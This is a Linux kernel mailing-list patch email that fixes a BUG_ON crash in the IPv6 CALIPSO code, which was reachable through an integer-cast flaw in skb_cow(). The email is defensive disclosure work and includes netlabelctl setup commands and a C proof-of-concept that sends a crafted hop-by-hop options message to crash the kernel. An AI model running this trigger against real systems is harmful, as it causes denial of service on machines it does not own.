From nobody Sun Feb  8 23:26:12 2026
Received: from mail-pl1-f178.google.com (mail-pl1-f178.google.com
 [209.85.214.178])
	(using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits))
	(No client certificate requested)
	by smtp.subspace.kernel.org (Postfix) with ESMTPS id 32AED22A817
	for <linux-kernel@vger.kernel.org>; Fri, 19 Dec 2025 17:37:01 +0000 (UTC)
Authentication-Results: smtp.subspace.kernel.org;
 arc=none smtp.client-ip=209.85.214.178
ARC-Seal: i=1; a=rsa-sha256; d=subspace.kernel.org; s=arc-20240116;
	t=1766165822; cv=none;
 b=mHVEuZNN8LIpN81PYd1CbWswDwx/I7GiGaG1e5uNwW2jcqKM6AwGkDWSjvn8/ihliuX2J75C6tg8B84gz6CNemfjLINm/Yw68FmzfU9R27+SkyhN5JMDmWwO4osM5ehs8/qpq2SWqEdxmvLIhL68BuWvAjPKcppxbiafu5UT3dA=
ARC-Message-Signature: i=1; a=rsa-sha256; d=subspace.kernel.org;
	s=arc-20240116; t=1766165822; c=relaxed/simple;
	bh=fBPcLJzYU1D6olJZyG5QeOnFX1y9SnFqnMzwb2S3bOk=;
	h=From:To:Cc:Subject:Date:Message-Id:MIME-Version;
 b=hqvBVT3PTG9zC8Iq/7h8/hU0L+zs/ecjuuhHaCj/aZC30dtLAQe6qWSX+0G7GvlRzI5OgoK6pO1zvejwbUb1MmS92dz1K06G0t0D3cpwMKT3L1YwdsIxyncBcZ6BcGZbK5FMAvwAwSpNKjCcJPeAIXsLKeHlm3TNknTvaMe6CmQ=
ARC-Authentication-Results: i=1; smtp.subspace.kernel.org;
 dmarc=pass (p=none dis=none) header.from=asu.edu;
 spf=pass smtp.mailfrom=asu.edu;
 dkim=pass (2048-bit key) header.d=asu.edu header.i=@asu.edu
 header.b=qYrTR9Zj; arc=none smtp.client-ip=209.85.214.178
Authentication-Results: smtp.subspace.kernel.org;
 dmarc=pass (p=none dis=none) header.from=asu.edu
Authentication-Results: smtp.subspace.kernel.org;
 spf=pass smtp.mailfrom=asu.edu
Authentication-Results: smtp.subspace.kernel.org;
	dkim=pass (2048-bit key) header.d=asu.edu header.i=@asu.edu
 header.b="qYrTR9Zj"
Received: by mail-pl1-f178.google.com with SMTP id
 d9443c01a7336-2a0834769f0so19373725ad.2
        for <linux-kernel@vger.kernel.org>;
 Fri, 19 Dec 2025 09:37:01 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=asu.edu; s=google; t=1766165820; x=1766770620; darn=vger.kernel.org;
        h=content-transfer-encoding:mime-version:message-id:date:subject:cc
         :to:from:from:to:cc:subject:date:message-id:reply-to;
        bh=qWEkn28lSdsbrh7pndq+YOZrud9XonPh1681Hfh8gwc=;
        b=qYrTR9Zj4SriTC+cbYu2aCgeK/JMdMTWXP4/db1cro68/fkw8DaE4axBwVkkGr4KQh
         fRi8wV7gZbYkKAw3hcNgLmlk3lTIYvehe933PFDCIpQbe7VTezvIJdeWUP7vOZW34SY6
         aqTIg6V/29tMqx+OPmHb8ItLbBDLywJmC+3lHUtcQ3AHt4coxsFScXcq+4hTqaNB9NmM
         FgfluVwDZDYiEDF27sTaxfDat17qryYTBib5okRnwONk+UEChQvSVThBPjrIt2LZxEVy
         Adv4friksAt2r8jGIAv8L0B3TkuKVT1MKfCHeXwe4wo1afazBKec5r2LLb4SWvKN3Z0t
         z/jw==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20230601; t=1766165820; x=1766770620;
        h=content-transfer-encoding:mime-version:message-id:date:subject:cc
         :to:from:x-gm-gg:x-gm-message-state:from:to:cc:subject:date
         :message-id:reply-to;
        bh=qWEkn28lSdsbrh7pndq+YOZrud9XonPh1681Hfh8gwc=;
        b=XQagIwuzurC077AQtNQe44I03GcK6xrgTPpXH9mSIQN9mysuhNzVxqT0Qzt6PdSd1P
         g49zaypWT/laxG86N3s+sVQ3S2EVS+BFuV/pBjnkOllxr6sedFZvSZIamYs6hlei/PFY
         Y7elZTYUmLQY6PazQUf2dRnwPjQd5Jpyz6O7iMOrAV0jUhqlOVyWGyxkw+fj4tH219rC
         FZXB9khKzhM+7b9QPau4foe64xfGaik+juUZtvDBj0C1x2AS+NIhEs5dGO+9AQB4bZmX
         8P73t4XKE0V7U06aLEAJUOROXoKjrvRPnpO3gF9iq6V9L8PDl0HDBRcdvYXSXZRE60Uq
         cX0g==
X-Forwarded-Encrypted: i=1;
 AJvYcCXBh01zakaLKI/fo51dAWizsLRf83C6c/32t9mgM+Z14vOy19Q17bilQSFIzg76PGUmJwYHWtpoWajeW0o=@vger.kernel.org
X-Gm-Message-State: AOJu0Yx6CDLPQeuVvJA2XRwp1091XZUcbpNpWIhcC0Wjf8/HzdCYU4cu
	IR82/oV1FGKm9NGBXovbJycnFz9yhfTlkkypBAvOfCPZubcAE2M7TMuD1gDxkk1/FQ==
X-Gm-Gg: AY/fxX69jCBoE02jwzfnYVmOyNTXL5Akx+Df9L0Dtgt9SlSJ8S8BMc6yS868uUU9nzN
	4GbbetNQ0UYYACMqqVhiKuDdQNT+LtX4DvMuKQp+d1U1t2p+3cOVv+UWbEkYBdDzfSDlYFzYKS8
	VXy3LM0eODIzG2cS2Gj9+PRvNcoSmx8NeRga4KKFWTul+ByNQ0eqtBYXTtyk5tpVkh5n4O/kqhP
	X+uMtSn9S6lJSwGYRF8Dyo7WXzZ2HsXpic79swAe44n9AkH02tstyN/IxyrNj+JI0R3Ef4FzmH0
	R4pahjFWqKmz5maUf/XXEhwjWEPjj+qRXFwTsh9aT3n4IHxw5T+Q4PXv6T3iLzJZ9j7kZYQgm4B
	iavIo0nppWcBCUxvesrgcE77usBFf2q/0jx0ijZbDUshW3Q9Rvx4iihQZe1ckzk5g+46QWnTsn4
	wcXuHnvItXNu9RsXdaTMsxGkbgtmmx3r3P24df7d1Vk2xAxjxScg==
X-Google-Smtp-Source: 
 AGHT+IGZmLahTbQF2vXNJwc6Yh8rcMpPUTa8s3yQUjD19Kf28sYcltQks0QBdNLfHalPlNgYh5BpCQ==
X-Received: by 2002:a05:7022:428b:b0:11b:94ab:be03 with SMTP id
 a92af1059eb24-121722ab5efmr4022936c88.20.1766165820360;
        Fri, 19 Dec 2025 09:37:00 -0800 (PST)
Received: from will-mint.dhcp.asu.edu (ip72-200-102-19.tc.ph.cox.net.
 [72.200.102.19])
        by smtp.googlemail.com with ESMTPSA id
 a92af1059eb24-121724de268sm7982235c88.8.2025.12.19.09.36.59
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Fri, 19 Dec 2025 09:36:59 -0800 (PST)
From: Will Rosenberg <whrosenb@asu.edu>
To: 
Cc: security@kernel.org,
	Will Rosenberg <whrosenb@asu.edu>,
	Paul Moore <paul@paul-moore.com>,
	"David S. Miller" <davem@davemloft.net>,
	David Ahern <dsahern@kernel.org>,
	Eric Dumazet <edumazet@google.com>,
	Jakub Kicinski <kuba@kernel.org>,
	Paolo Abeni <pabeni@redhat.com>,
	Simon Horman <horms@kernel.org>,
	Huw Davies <huw@codeweavers.com>,
	netdev@vger.kernel.org,
	linux-security-module@vger.kernel.org,
	linux-kernel@vger.kernel.org
Subject: [PATCH] ipv6: BUG() in pskb_expand_head() as part of
 calipso_skbuff_setattr()
Date: Fri, 19 Dec 2025 10:36:37 -0700
Message-Id: <20251219173637.797418-1-whrosenb@asu.edu>
X-Mailer: git-send-email 2.34.1
Precedence: bulk
X-Mailing-List: linux-kernel@vger.kernel.org
List-Id: <linux-kernel.vger.kernel.org>
List-Subscribe: <mailto:linux-kernel+subscribe@vger.kernel.org>
List-Unsubscribe: <mailto:linux-kernel+unsubscribe@vger.kernel.org>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="utf-8"

There exists a kernel oops caused by a BUG_ON(nhead < 0) at
net/core/skbuff.c:2232 in pskb_expand_head().
This bug is triggered as part of the calipso_skbuff_setattr()
routine when skb_cow() is passed headroom > INT_MAX
(i.e. (int)(skb_headroom(skb) + len_delta) < 0).

The root cause of the bug is due to an implicit integer cast in
__skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure
that delta =3D headroom - skb_headroom(skb) is never negative, otherwise
we will trigger a BUG_ON in pskb_expand_head(). However, if
headroom > INT_MAX and delta <=3D -NET_SKB_PAD, the check passes, delta
becomes negative, and pskb_expand_head() is passed a negative value for
nhead.

Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing
"negative" headroom sizes to skb_cow() within calipso_skbuff_setattr()
by only using skb_cow() to grow headroom.

PoC:
	Using `netlabelctl` tool:

        netlabelctl map del default
        netlabelctl calipso add pass doi:7
        netlabelctl map add default address:0::1/128 protocol:calipso,7

        Then run the following PoC:

        int fd =3D socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);

        // setup msghdr
        int cmsg_size =3D 2;
        int cmsg_len =3D 0x60;
        struct msghdr msg;
        struct sockaddr_in6 dest_addr;
        struct cmsghdr * cmsg =3D (struct cmsghdr *) calloc(1,
                        sizeof(struct cmsghdr) + cmsg_len);
        msg.msg_name =3D &dest_addr;
        msg.msg_namelen =3D sizeof(dest_addr);
        msg.msg_iov =3D NULL;
        msg.msg_iovlen =3D 0;
        msg.msg_control =3D cmsg;
        msg.msg_controllen =3D cmsg_len;
        msg.msg_flags =3D 0;

        // setup sockaddr
        dest_addr.sin6_family =3D AF_INET6;
        dest_addr.sin6_port =3D htons(31337);
        dest_addr.sin6_flowinfo =3D htonl(31337);
        dest_addr.sin6_addr =3D in6addr_loopback;
        dest_addr.sin6_scope_id =3D 31337;

        // setup cmsghdr
        cmsg->cmsg_len =3D cmsg_len;
        cmsg->cmsg_level =3D IPPROTO_IPV6;
        cmsg->cmsg_type =3D IPV6_HOPOPTS;
        char * hop_hdr =3D (char *)cmsg + sizeof(struct cmsghdr);
        hop_hdr[1] =3D 0x9; //set hop size - (0x9 + 1) * 8 =3D 80

        sendmsg(fd, &msg, 0);

Fixes: 2917f57b6bc1 ("calipso: Allow the lsm to label the skbuff directly.")
Signed-off-by: Will Rosenberg <whrosenb@asu.edu>
Acked-by: Paul Moore <paul@paul-moore.com>
---

Notes:
    -Changing __skb_cow() would likely require an audit of all its use
    cases due to its long legacy in the kernel. After private discussions,
    it was decided that this patch should be applied to calipso to remedy
    the immediate symptoms and allow for easy backporting. However, net
    devs should consider remedying the root cause through __skb_cow()
    and skb_cow().
   =20
    -Paul, please let me know if I should add any form of credit for
    the patch code, such as "Suggested-By."

 net/ipv6/calipso.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/net/ipv6/calipso.c b/net/ipv6/calipso.c
index df1986973430..21f6ed126253 100644
--- a/net/ipv6/calipso.c
+++ b/net/ipv6/calipso.c
@@ -1342,7 +1342,8 @@ static int calipso_skbuff_setattr(struct sk_buff *skb,
 	/* At this point new_end aligns to 4n, so (new_end & 4) pads to 8n */
 	pad =3D ((new_end & 4) + (end & 7)) & 7;
 	len_delta =3D new_end - (int)end + pad;
-	ret_val =3D skb_cow(skb, skb_headroom(skb) + len_delta);
+	ret_val =3D skb_cow(skb,
+			  skb_headroom(skb) + (len_delta > 0 ? len_delta : 0));
 	if (ret_val < 0)
 		return ret_val;
=20

base-commit: ea1013c1539270e372fc99854bc6e4d94eaeff66
--=20
2.34.1